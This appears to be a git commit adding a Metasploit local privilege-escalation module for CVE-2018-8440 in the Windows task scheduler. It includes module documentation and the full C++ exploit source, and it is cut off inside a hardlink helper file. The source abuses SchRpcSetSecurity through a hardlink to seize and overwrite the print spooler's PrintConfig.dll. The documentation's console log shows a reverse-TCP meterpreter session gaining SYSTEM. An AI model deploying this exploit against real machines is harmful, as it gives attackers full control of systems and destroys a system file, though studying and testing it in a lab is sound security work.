parent
456f7613cf
commit
2b194e2b47
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,89 @@
|
|||
## Description
|
||||
|
||||
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to `.job` files located in `c:\windows\tasks` because the scheduler does not use impersonation when checking this location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file.
|
||||
|
||||
WARNING:
|
||||
The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
|
||||
will be overwritten when the exploit runs.
|
||||
|
||||
This module has been tested against Windows 10 Pro x64.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Affected Windows OS versions and related patch details can be found in the [Microsoft Advisory for CVE-2018-8440](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
* Get a meterpreter session on Windows 10 x64
|
||||
* `use exploit/windows/local/alpc_taskscheduler`
|
||||
* `set session <session>`
|
||||
* `set payload <payload>`
|
||||
* `set lhost <lhost>`
|
||||
* `run`
|
||||
* Get a session as SYSTEM
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Windows 10 Pro Version 1803 x64
|
||||
|
||||
```
|
||||
msf5 > use exploit/windows/local/alpc_taskscheduler
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
|
||||
payload => windows/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136
|
||||
lhost => 172.22.222.136
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
1 shell x64/windows Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al... 172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
|
||||
2 meterpreter x64/windows DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR 172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)
|
||||
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
|
||||
|
||||
[!] SESSION may not be compatible with this module.
|
||||
[*] Started reverse TCP handler on 172.22.222.136:4444
|
||||
[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
|
||||
[*] Exploit completed, but no session was created.
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
|
||||
session => 2
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.22.222.136:4444
|
||||
[*] Checking target...
|
||||
[*] Target Looks Good... trying to start notepad.exe
|
||||
[*] Launching notepad.exe to host the exploit...
|
||||
[+] Process 6140 launched.
|
||||
[*] Writing payload dll into process 6140 memory
|
||||
[*] Reflectively injecting the exploit DLL into 6140...
|
||||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
||||
[*] Sending stage (206403 bytes) to 172.22.222.200
|
||||
[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-IPOGIJR
|
||||
OS : Windows 10 (Build 17134).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 3
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 3...
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
|
||||
session => 3
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.22.222.136:4444
|
||||
[*] Checking target...
|
||||
[-] Exploit aborted due to failure: none: Session is already elevated
|
||||
[*] Exploit completed, but no session was created.
|
||||
msf5 exploit(windows/local/alpc_taskscheduler) >
|
||||
```
|
|
@ -0,0 +1,41 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio 2013
|
||||
VisualStudioVersion = 12.0.40629.0
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ALPC-TaskSched-LPE", "ALPC-TaskSched-LPE\ALPC-TaskSched-LPE.vcxproj", "{E75DCF6C-9B6D-49C8-96D7-0003C127B449}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|ARM = Debug|ARM
|
||||
Debug|Win32 = Debug|Win32
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|ARM = Release|ARM
|
||||
Release|Win32 = Release|Win32
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|ARM.ActiveCfg = Debug|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.Build.0 = Debug|x64
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.Build.0 = Debug|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|ARM.ActiveCfg = Release|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|Win32.Build.0 = Release|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.ActiveCfg = Release|x64
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.Build.0 = Release|x64
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.ActiveCfg = Release|Win32
|
||||
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {AA32DEA9-85D3-447D-820E-C6ACA3AD0CBD}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
151
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
vendored
Executable file
151
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
vendored
Executable file
|
@ -0,0 +1,151 @@
|
|||
//***************************************************************//
|
||||
// Windows LPE - Non-admin/Guest to system - by SandboxEscaper //
|
||||
//***************************************************************//
|
||||
|
||||
/* _SchRpcSetSecurity which is part of the task scheduler ALPC endpoint allows us to set an arbitrary DACL.
|
||||
It will Set the security of a file in c:\windows\tasks without impersonating, a non-admin (works from Guest too) user can write here.
|
||||
Before the task scheduler writes the DACL we can create a hard link to any file we have read access over.
|
||||
This will result in an arbitrary DACL write.
|
||||
This PoC will overwrite a printer related dll and use it as a hijacking vector. This is ofcourse one of many options to abuse this.*/
|
||||
|
||||
#include "stdafx.h"
|
||||
#include "rpc_h.h"
|
||||
#include <xpsprint.h>
|
||||
#include <fstream>
|
||||
#pragma comment(lib, "rpcrt4.lib")
|
||||
using namespace std;
|
||||
|
||||
//extern "C" __declspec (dllexport) DWORD CALLBACK ExploitThread(LPVOID);
|
||||
|
||||
RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle)
|
||||
{
|
||||
RPC_STATUS status;
|
||||
RPC_BINDING_HANDLE v5;
|
||||
RPC_SECURITY_QOS SecurityQOS = {};
|
||||
RPC_WSTR StringBinding = nullptr;
|
||||
RPC_BINDING_HANDLE Binding;
|
||||
|
||||
StringBinding = 0;
|
||||
Binding = 0;
|
||||
status = RpcStringBindingComposeW(L"c8ba73d2-3d55-429c-8e9a-c44f006f69fc", L"ncalrpc",
|
||||
nullptr, nullptr, nullptr, &StringBinding);
|
||||
if (status == RPC_S_OK)
|
||||
{
|
||||
status = RpcBindingFromStringBindingW(StringBinding, &Binding);
|
||||
RpcStringFreeW(&StringBinding);
|
||||
if (!status)
|
||||
{
|
||||
SecurityQOS.Version = 1;
|
||||
SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
|
||||
SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
|
||||
SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;
|
||||
|
||||
status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS);
|
||||
if (!status)
|
||||
{
|
||||
v5 = Binding;
|
||||
Binding = 0;
|
||||
*binding_handle = v5;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (Binding)
|
||||
RpcBindingFree(&Binding);
|
||||
return status;
|
||||
}
|
||||
|
||||
extern "C" void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len)
|
||||
{
|
||||
return(malloc(len));
|
||||
}
|
||||
|
||||
extern "C" void __RPC_USER midl_user_free(void __RPC_FAR * ptr)
|
||||
{
|
||||
free(ptr);
|
||||
}
|
||||
|
||||
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);
|
||||
|
||||
void RunExploit()
|
||||
{
|
||||
RPC_BINDING_HANDLE handle;
|
||||
RPC_STATUS status = CreateBindingHandle(&handle);
|
||||
|
||||
//These two functions will set the DACL on an arbitrary file (see hardlink in main), change the security descriptor string parameters if needed.
|
||||
_SchRpcCreateFolder(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0);
|
||||
_SchRpcSetSecurity(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0);
|
||||
}
|
||||
|
||||
int mainf(LPVOID lpReserved)
|
||||
{
|
||||
//We enumerate the path of PrintConfig.dll, which we will write the DACL of and overwrite to hijack the print spooler service
|
||||
//You might want to expand this code block with FindNextFile .. as there may be multiple prnms003.inf_amd64* folders since older versions do not get cleaned up it in some rare cases.
|
||||
//When this happens this code has no garantuee that it will target the dll that ends up getting loaded... and you really want to avoid this.
|
||||
WIN32_FIND_DATA FindFileData;
|
||||
HANDLE hFind;
|
||||
wchar_t searchLoc[MAX_PATH], prntCnfg[MAX_PATH];
|
||||
UINT szPath = 0, szPath1 = 0;
|
||||
szPath = GetSystemDirectory(searchLoc, MAX_PATH);
|
||||
szPath1 = GetSystemDirectory(prntCnfg, MAX_PATH);
|
||||
if (szPath == 0 || szPath1 == 0){
|
||||
return (-1);
|
||||
}
|
||||
wcscat(searchLoc, L"\\DriverStore\\FileRepository\\prnms003.inf_amd64*");
|
||||
wcscat(prntCnfg, L"\\DriverStore\\FileRepository\\");
|
||||
|
||||
hFind = FindFirstFile(searchLoc, &FindFileData);
|
||||
wchar_t PrinterDriverFolder[MAX_PATH];
|
||||
wchar_t EndPath[23] = L"\\Amd64\\PrintConfig.dll";
|
||||
wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName));
|
||||
FindClose(hFind);
|
||||
wcscat(prntCnfg, PrinterDriverFolder);
|
||||
wcscat(prntCnfg, EndPath);
|
||||
|
||||
//Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of
|
||||
wchar_t jobPath[MAX_PATH];
|
||||
szPath = GetSystemWindowsDirectory(jobPath, MAX_PATH);
|
||||
if (szPath == 0){
|
||||
return (-1);
|
||||
}
|
||||
wcscat(jobPath, L"\\tasks\\UpdateTask.job");
|
||||
CreateNativeHardlink(jobPath, prntCnfg);
|
||||
RunExploit();
|
||||
|
||||
MEMORY_BASIC_INFORMATION lpBuffer;
|
||||
VirtualQuery(lpReserved, &lpBuffer, sizeof(MEMORY_BASIC_INFORMATION));
|
||||
|
||||
//We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue
|
||||
HANDLE hFile;
|
||||
DWORD dwBytesWritten = 0;
|
||||
do {
|
||||
hFile = CreateFile(prntCnfg, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
WriteFile(hFile, (char*)lpBuffer.AllocationBase, (DWORD)lpBuffer.RegionSize, &dwBytesWritten, NULL);
|
||||
if (hFile == INVALID_HANDLE_VALUE)
|
||||
{
|
||||
Sleep(5000);
|
||||
}
|
||||
} while (hFile == INVALID_HANDLE_VALUE);
|
||||
CloseHandle(hFile);
|
||||
|
||||
//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.
|
||||
CoInitialize(nullptr);
|
||||
IXpsOMObjectFactory *xpsFactory = NULL;
|
||||
CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast<LPVOID*>(&xpsFactory));
|
||||
HANDLE completionEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
|
||||
IXpsPrintJob *job = NULL;
|
||||
IXpsPrintJobStream *jobStream = NULL;
|
||||
|
||||
StartXpsPrintJob(L"Microsoft XPS Document Writer", L"Print Job 1", NULL, NULL, completionEvent, NULL, 0, &job, &jobStream, NULL);
|
||||
|
||||
// jobStream->Close();
|
||||
CoUninitialize();
|
||||
return 0;
|
||||
}
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID lpReserved)
|
||||
{
|
||||
mainf(lpReserved);
|
||||
FreeLibraryAndExitThread(GetModuleHandle(NULL), 0);
|
||||
return 0;
|
||||
}
|
55
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters
vendored
Executable file
55
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters
vendored
Executable file
|
@ -0,0 +1,55 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="ntimports.h">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="resource.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="rpc_h.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="stdafx.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="PocStorSvc.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="rpc_c.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Hardlink.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Midl Include="rpc.idl">
|
||||
<Filter>Source Files</Filter>
|
||||
</Midl>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ResourceCompile Include="Resource.rc" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="..\x64\Release\exploit.dll" />
|
||||
</ItemGroup>
|
||||
</Project>
|
174
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj
vendored
Executable file
174
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj
vendored
Executable file
|
@ -0,0 +1,174 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>15.0</VCProjectVersion>
|
||||
<ProjectGuid>{E75DCF6C-9B6D-49C8-96D7-0003C127B449}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>Poc_StorSvc</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0.16299.0</WindowsTargetPlatformVersion>
|
||||
<ProjectName>ALPC-TaskSched-LPE</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v141</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v141</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v141</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<IncludePath>..\..\..\..\ReflectiveDLLInjection\common;$(IncludePath)</IncludePath>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>false</SDLCheck>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<AdditionalDependencies>xpsprint.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="..\..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
|
||||
<ClInclude Include="..\..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
|
||||
<ClInclude Include="ntimports.h" />
|
||||
<ClInclude Include="rpc_h.h" />
|
||||
<ClInclude Include="stdafx.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
|
||||
<ClCompile Include="ALPC-TaskSched-LPE.cpp" />
|
||||
<ClCompile Include="dllmain.cpp" />
|
||||
<ClCompile Include="Hardlink.cpp" />
|
||||
<ClCompile Include="rpc_c.c">
|
||||
<RuntimeLibrary Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">MultiThreadedDLL</RuntimeLibrary>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Midl Include="rpc.idl" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
106
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/Hardlink.cpp
vendored
Executable file
106
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/Hardlink.cpp
vendored
Executable file
|
@ -0,0 +1,106 @@
|
|||
// Copyright 2015 Google Inc. All Rights Reserved.
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http ://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
#include "stdafx.h"
|
||||
#include "ntimports.h"
|
||||
#include "typed_buffer.h"
|
||||
#include <string>
|
||||
|
||||
std::wstring BuildFullPath(const std::wstring& path, bool native)
|
||||
{
|
||||
std::wstring ret;
|
||||
WCHAR buf[MAX_PATH];
|
||||
|
||||
if (native)
|
||||
{
|
||||
ret = L"\\??\\";
|
||||
}
|
||||
|
||||
if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0)
|
||||
{
|
||||
ret += buf;
|
||||
}
|
||||
else
|
||||
{
|
||||
ret += path;
|
||||
}
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
FARPROC GetProcAddressNT(LPCSTR lpName)
|
